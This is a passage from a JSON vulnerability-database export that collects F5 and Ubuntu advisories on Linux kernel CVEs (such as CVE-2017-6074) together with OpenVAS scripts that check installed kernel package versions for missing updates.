\nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.1.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 4.0.2 | 5.0.0 - 5.1.0 \n4.0.5 - 4.4.0 \n4.0.0 | High | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-06-10T02:01:00", "published": "2017-03-11T02:23:00", "id": "F5:K82508682", "href": "https://support.f5.com/csp/article/K82508682", "title": "Linux kernel vulnerability CVE-2017-6074", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2015-4700"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-10-16T00:00:00", "published": "2015-10-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/400/sol17445.html", "id": "SOL17445", "title": "SOL17445 - Linux kernel vulnerability CVE-2015-4700", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6074", "CVE-2016-10088", "CVE-2016-9588"], "description": "It was discovered that the generic SCSI block layer in the Linux kernel did \nnot properly restrict write operations in certain situations. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly gain administrative privileges. (CVE-2016-10088)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). \n(CVE-2016-9588)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly gain administrative \nprivileges. (CVE-2017-6074)", "edition": 6, "modified": "2017-02-22T00:00:00", "published": "2017-02-22T00:00:00", "id": "USN-3209-1", "href": "https://ubuntu.com/security/notices/USN-3209-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-6213", "CVE-2016-4568", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644", "CVE-2016-8645"], "description": "Tilman Schmidt and Sasha Levin discovered a use-after-free condition in the \nTTY implementation in the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2015-8964)\n\nIt was discovered that the Video For Linux Two (v4l2) implementation in the \nLinux kernel did not properly handle multiple planes when processing a \nVIDIOC_DQBUF ioctl(). A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2016-4568)\n\nCAI Qian discovered that shared bind mounts in a mount namespace \nexponentially added entries without restriction to the Linux kernel's mount \ntable. A local attacker could use this to cause a denial of service (system \ncrash). (CVE-2016-6213)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem \nimplementation in the Linux kernel did not clear the setgid bit during a \nsetxattr call. A local attacker could use this to possibly elevate group \nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the \nLinux kernel did not properly validate control messages. A local attacker \ncould use this to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-7425)\n\nIt was discovered that the KVM implementation for x86/x86_64 in the Linux \nkernel could dereference a null pointer. An attacker in a guest virtual \nmachine could use this to cause a denial of service (system crash) in the \nKVM host. (CVE-2016-8630)\n\nEyal Itkin discovered that the IP over IEEE 1394 (FireWire) implementation \nin the Linux kernel contained a buffer overflow when handling fragmented \npackets. A remote attacker could use this to possibly execute arbitrary \ncode with administrative privileges. (CVE-2016-8633)\n\nMarco Grassi discovered that the TCP implementation in the Linux kernel \nmishandles socket buffer (skb) truncation. A local attacker could use this \nto cause a denial of service (system crash). (CVE-2016-8645)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom \nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-8658)\n\nAndrey Konovalov discovered that the SCTP implementation in the Linux \nkernel improperly handled validation of incoming data. A remote attacker \ncould use this to cause a denial of service (system crash). (CVE-2016-9555)\n\nIt was discovered that the __get_user_asm_ex implementation in the Linux \nkernel for x86/x86_64 contained extended asm statements that were \nincompatible with the exception table. A local attacker could use this to \ngain administrative privileges. (CVE-2016-9644)", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-12-20T00:00:00", "id": "USN-3161-4", "href": "https://ubuntu.com/security/notices/USN-3161-4", "title": "Linux kernel (Qualcomm Snapdragon) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-2584", "CVE-2017-6074", "CVE-2016-10088", "CVE-2017-2583", "CVE-2016-9588", "CVE-2017-5549"], "description": "USN-3208-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nIt was discovered that the generic SCSI block layer in the Linux kernel did \nnot properly restrict write operations in certain situations. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly gain administrative privileges. (CVE-2016-10088)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel did \nnot properly perform reference counting in some situations. An unprivileged \nattacker could use this to cause a denial of service (system hang). \n(CVE-2016-9191)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). \n(CVE-2016-9588)\n\nAndy Lutomirski and Willy Tarreau discovered that the KVM implementation in \nthe Linux kernel did not properly emulate instructions on the SS segment \nregister. A local attacker in a guest virtual machine could use this to \ncause a denial of service (guest OS crash) or possibly gain administrative \nprivileges in the guest OS. (CVE-2017-2583)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \nimproperly emulated certain instructions. A local attacker could use this \nto obtain sensitive information (kernel memory). (CVE-2017-2584)\n\nIt was discovered that the KLSI KL5KUSB105 serial-to-USB device driver in \nthe Linux kernel did not properly initialize memory related to logging. A \nlocal attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-5549)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly gain administrative \nprivileges. (CVE-2017-6074)", "edition": 5, "modified": "2017-02-22T00:00:00", "published": "2017-02-22T00:00:00", "id": "USN-3208-2", "href": "https://ubuntu.com/security/notices/USN-3208-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-2584", "CVE-2017-6074", "CVE-2016-10088", "CVE-2017-2583", "CVE-2016-9588", "CVE-2017-5549"], "description": "It was discovered that the generic SCSI block layer in the Linux kernel did \nnot properly restrict write operations in certain situations. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly gain administrative privileges. (CVE-2016-10088)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel did \nnot properly perform reference counting in some situations. An unprivileged \nattacker could use this to cause a denial of service (system hang). \n(CVE-2016-9191)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). \n(CVE-2016-9588)\n\nAndy Lutomirski and Willy Tarreau discovered that the KVM implementation in \nthe Linux kernel did not properly emulate instructions on the SS segment \nregister. A local attacker in a guest virtual machine could use this to \ncause a denial of service (guest OS crash) or possibly gain administrative \nprivileges in the guest OS. (CVE-2017-2583)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \nimproperly emulated certain instructions. A local attacker could use this \nto obtain sensitive information (kernel memory). (CVE-2017-2584)\n\nIt was discovered that the KLSI KL5KUSB105 serial-to-USB device driver in \nthe Linux kernel did not properly initialize memory related to logging. A \nlocal attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-5549)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly gain administrative \nprivileges. (CVE-2017-6074)", "edition": 6, "modified": "2017-02-22T00:00:00", "published": "2017-02-22T00:00:00", "id": "USN-3208-1", "href": "https://ubuntu.com/security/notices/USN-3208-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-6213", "CVE-2016-4568", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-9178", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-7042", "CVE-2016-8645"], "description": "Tilman Schmidt and Sasha Levin discovered a use-after-free condition in the \nTTY implementation in the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2015-8964)\n\nIt was discovered that the Video For Linux Two (v4l2) implementation in the \nLinux kernel did not properly handle multiple planes when processing a \nVIDIOC_DQBUF ioctl(). A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2016-4568)\n\nCAI Qian discovered that shared bind mounts in a mount namespace \nexponentially added entries without restriction to the Linux kernel's mount \ntable. A local attacker could use this to cause a denial of service (system \ncrash). (CVE-2016-6213)\n\nOndrej Kozina discovered that the keyring interface in the Linux kernel \ncontained a buffer overflow when displaying timeout events via the \n/proc/keys interface. A local attacker could use this to cause a denial of \nservice (system crash). (CVE-2016-7042)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem \nimplementation in the Linux kernel did not clear the setgid bit during a \nsetxattr call. A local attacker could use this to possibly elevate group \nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the \nLinux kernel did not properly validate control messages. A local attacker \ncould use this to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-7425)\n\nIt was discovered that the KVM implementation for x86/x86_64 in the Linux \nkernel could dereference a null pointer. An attacker in a guest virtual \nmachine could use this to cause a denial of service (system crash) in the \nKVM host. (CVE-2016-8630)\n\nEyal Itkin discovered that the IP over IEEE 1394 (FireWire) implementation \nin the Linux kernel contained a buffer overflow when handling fragmented \npackets. A remote attacker could use this to possibly execute arbitrary \ncode with administrative privileges. (CVE-2016-8633)\n\nMarco Grassi discovered that the TCP implementation in the Linux kernel \nmishandles socket buffer (skb) truncation. A local attacker could use this \nto cause a denial of service (system crash). (CVE-2016-8645)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom \nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-8658)\n\nIt was discovered that an information leak existed in __get_user_asm_ex() \nin the Linux kernel. A local attacker could use this to expose sensitive \ninformation. (CVE-2016-9178)\n\nAndrey Konovalov discovered that the SCTP implementation in the Linux \nkernel improperly handled validation of incoming data. A remote attacker \ncould use this to cause a denial of service (system crash). (CVE-2016-9555)", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-12-20T00:00:00", "id": "USN-3161-3", "href": "https://ubuntu.com/security/notices/USN-3161-3", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:27:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-6213", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-7425", "CVE-2016-9313", "CVE-2016-8645"], "description": "CAI Qian discovered that shared bind mounts in a mount namespace \nexponentially added entries without restriction to the Linux kernel's mount \ntable. A local attacker could use this to cause a denial of service (system \ncrash). (CVE-2016-6213)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem \nimplementation in the Linux kernel did not clear the setgid bit during a \nsetxattr call. A local attacker could use this to possibly elevate group \nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the \nLinux kernel did not properly validate control messages. A local attacker \ncould use this to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-7425)\n\nIt was discovered that the KVM implementation for x86/x86_64 in the Linux \nkernel could dereference a null pointer. An attacker in a guest virtual \nmachine could use this to cause a denial of service (system crash) in the \nKVM host. (CVE-2016-8630)\n\nEyal Itkin discovered that the IP over IEEE 1394 (FireWire) implementation \nin the Linux kernel contained a buffer overflow when handling fragmented \npackets. A remote attacker could use this to possibly execute arbitrary \ncode with administrative privileges. (CVE-2016-8633)\n\nMarco Grassi discovered that the TCP implementation in the Linux kernel \nmishandles socket buffer (skb) truncation. A local attacker could use this \nto cause a denial of service (system crash). (CVE-2016-8645)\n\nIt was discovered that the keyring implementation in the Linux kernel \nimproperly handled crypto registration in conjunction with successful key- \ntype registration. A local attacker could use this to cause a denial of \nservice (system crash). (CVE-2016-9313)\n\nAndrey Konovalov discovered that the SCTP implementation in the Linux \nkernel improperly handled validation of incoming data. A remote attacker \ncould use this to cause a denial of service (system crash). (CVE-2016-9555)", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-12-20T00:00:00", "id": "USN-3162-2", "href": "https://ubuntu.com/security/notices/USN-3162-2", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644"], "description": "USN-3146-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nIt was discovered that the __get_user_asm_ex implementation in the Linux \nkernel for x86/x86_64 contained extended asm statements that were \nincompatible with the exception table. A local attacker could use this to \ngain administrative privileges. (CVE-2016-9644)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem \nimplementation in the Linux kernel did not clear the setgid bit during a \nsetxattr call. A local attacker could use this to possibly elevate group \nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the \nLinux kernel did not properly validate control messages. A local attacker \ncould use this to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-7425)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom \nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-8658)", "edition": 5, "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "id": "USN-3146-2", "href": "https://ubuntu.com/security/notices/USN-3146-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:36:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644"], "description": "It was discovered that the __get_user_asm_ex implementation in the Linux \nkernel for x86/x86_64 contained extended asm statements that were \nincompatible with the exception table. A local attacker could use this to \ngain administrative privileges. (CVE-2016-9644)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem \nimplementation in the Linux kernel did not clear the setgid bit during a \nsetxattr call. A local attacker could use this to possibly elevate group \nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the \nLinux kernel did not properly validate control messages. A local attacker \ncould use this to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-7425)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom \nIEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly gain \nprivileges. (CVE-2016-8658)", "edition": 5, "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "id": "USN-3146-1", "href": "https://ubuntu.com/security/notices/USN-3146-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6074", "CVE-2016-10088", "CVE-2016-9588"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-02-22T00:00:00", "id": "OPENVAS:1361412562310843060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843060", "type": "openvas", "title": "Ubuntu Update for linux USN-3209-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3209-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843060\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-22 15:14:42 +0100 (Wed, 22 Feb 2017)\");\n script_cve_id(\"CVE-2016-10088\", \"CVE-2016-9588\", \"CVE-2017-6074\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3209-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the generic SCSI block layer in the Linux kernel did\nnot properly restrict write operations in certain situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2016-10088)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual\nmachine could use this to cause a denial of service (guest OS crash).\n(CVE-2016-9588)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly gain administrative\nprivileges. (CVE-2017-6074)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3209-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3209-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1026-raspi2\", ver:\"4.8.0-1026.29\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-39-generic\", ver:\"4.8.0-39.42\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-39-generic-lpae\", ver:\"4.8.0-39.42\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-39-lowlatency\", ver:\"4.8.0-39.42\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-39-powerpc-e500mc\", ver:\"4.8.0-39.42\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-39-powerpc-smp\", ver:\"4.8.0-39.42\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-39-powerpc64-emb\", ver:\"4.8.0-39.42\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.8.0.39.50\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.8.0.39.50\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.8.0.39.50\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.8.0.39.50\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.8.0.39.50\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.8.0.39.50\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.8.0.1026.29\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-6213", "CVE-2016-4568", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644", "CVE-2016-8645"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-21T00:00:00", "id": "OPENVAS:1361412562310842997", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842997", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3161-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3161-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842997\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-21 05:45:01 +0100 (Wed, 21 Dec 2016)\");\n script_cve_id(\"CVE-2015-8964\", \"CVE-2016-4568\", \"CVE-2016-6213\", \"CVE-2016-7097\",\n\t\t\"CVE-2016-7425\", \"CVE-2016-8630\", \"CVE-2016-8633\", \"CVE-2016-8645\",\n\t\t\"CVE-2016-8658\", \"CVE-2016-9555\", \"CVE-2016-9644\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3161-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Tilman Schmidt and Sasha Levin discovered\n a use-after-free condition in the TTY implementation in the Linux kernel. A\n local attacker could use this to expose sensitive information (kernel memory).\n (CVE-2015-8964)\n\nIt was discovered that the Video For Linux Two (v4l2) implementation in the\nLinux kernel did not properly handle multiple planes when processing a\nVIDIOC_DQBUF ioctl(). A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2016-4568)\n\nCAI Qian discovered that shared bind mounts in a mount namespace\nexponentially added entries without restriction to the Linux kernel's mount\ntable. A local attacker could use this to cause a denial of service (system\ncrash). (CVE-2016-6213)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during a\nsetxattr call. A local attacker could use this to possibly elevate group\nprivileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the\nLinux kernel did not properly validate control messages. A local attacker\ncould use this to cause a denial of service (system crash) or possibly gain\nprivileges. (CVE-2016-7425)\n\nIt was discovered that the KVM implementation for x86/x86_64 in the Linux\nkernel could dereference a null pointer. An attacker in a guest virtual\nmachine could use this to cause a denial of service (system crash) in the\nKVM host. (CVE-2016-8630)\n\nEyal Itkin discovered that the IP over IEEE 1394 (FireWire) implementation\nin the Linux kernel contained a buffer overflow when handling fragmented\npackets. A remote attacker could use this to 